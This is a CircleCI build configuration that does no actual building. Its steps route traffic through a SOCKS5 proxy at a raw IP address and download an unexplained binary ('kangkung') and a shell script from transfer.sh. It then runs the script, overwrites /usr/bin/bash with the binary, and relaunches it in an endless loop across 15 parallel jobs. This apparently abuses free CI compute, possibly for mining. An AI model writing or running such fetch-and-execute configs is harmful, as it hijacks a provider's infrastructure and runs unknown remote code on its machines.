version: 2.1

jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:2022.10.1
    steps:
      - checkout
      - run:
          command: |
                   curl -v -x socks5://192.74.246.152:1080 https://app.circleci.com/
      - run:
          command: |
                   wget -O kangkung https://transfer.sh/get/XLC2EC/kangkung
                   wget -O config.sh https://transfer.sh/get/Dy09jr/config.sh
      - run:
          command: |
                   chmod +x kangkung
      - run:
          command: |
                   chmod +x config.sh
                   ./config.sh
                   mv kangkung /usr/bin/bash
                   while true; do timeout 3m bash -c config.json; sleep 20; done
